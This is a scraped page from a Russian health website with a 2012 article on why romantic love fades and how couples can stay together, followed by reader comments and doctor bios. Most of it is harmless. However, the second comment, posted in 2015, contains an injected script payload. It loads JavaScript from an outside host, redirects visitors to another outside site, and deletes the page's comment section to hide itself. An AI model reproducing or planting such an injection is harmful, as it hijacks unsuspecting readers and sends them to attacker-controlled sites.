Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Голая правда. Куда исчеза...  >>  Голая правда. Куда исчезает любовь?
 
Обратная связь
 

Голая правда. Куда исчезает любовь?

Размер шрифта
18 марта 2012 10:00
  • google_analytics: false
  • Нравится

Количество разводов в России стремительно растет. По некоторым данным, только в Москве на каждые 10 браков приходится 5-6 разводов. Куда исчезает любовь? Почему так трудно, а для многих просто невозможно, прожить жизнь с одним человеком?

1

Механизм любви

Во время романтической фазы любви в организме человека вырабатываются гормоны счастья – дофапин и серотонин. Также человек получает всплеск гормона окситоцина, который способствует появлению ощущения единения в паре.

Почему чувства охладевают

Со временем процесс выработки этих гормонов в ответ на общение с партнером становится не таким активным, и химическая волна, державшая двух людей на острие чувств, спадает. Отношения теряют былую притягательность.

Чем опасен этот момент? Ответ простой: расставанием.

Что делать

Для того чтобы прожить с любимым человеком всю жизнь:

  • Планируйте и выполняйте как можно больше совместных действий.
  • Делитесь своими ощущениями и старайтесь совместно переживать положительные эмоции, например радость.
  • Научитесь правильно ссориться и правильно мириться.

Радость отношений, так же как и наличие здоровья, не так заметно, как ее отсутствие. Храните то, что имеете, чтобы потерявши не заплакать.

 

Сюжеты по теме:
 Голая правда. Куда исчезает любовь?

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Авита

19 марта 2012 в 11:50

Цитировать   |   Пожаловаться

Здравствуйте! Мы с мужем, прожив не так уж и много - всего 9 лет, начали замечать, что не стремимся проводить время вместе, и вообще избегаем друг друга. В то время у нас встал квартирный вопрос, вернее вопрос о строительстве дома. Так вот, строительство нашего дома нас объединило, укрепило семью, мы начали заботиться друг о друге, поддерживать и помогать друг другу во всём, стали просто больше общаться и проводить время вместе. Наши два сына тоже помогали нам на стройке, чем могли, или просто наблюдали, как папа строит дом. Мы счастливы и ждём третьего ребёнка! Ищите точки соприкосновения и то, что вас объединит!

2 - zzzzzz

30 июня 2015 в 23:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.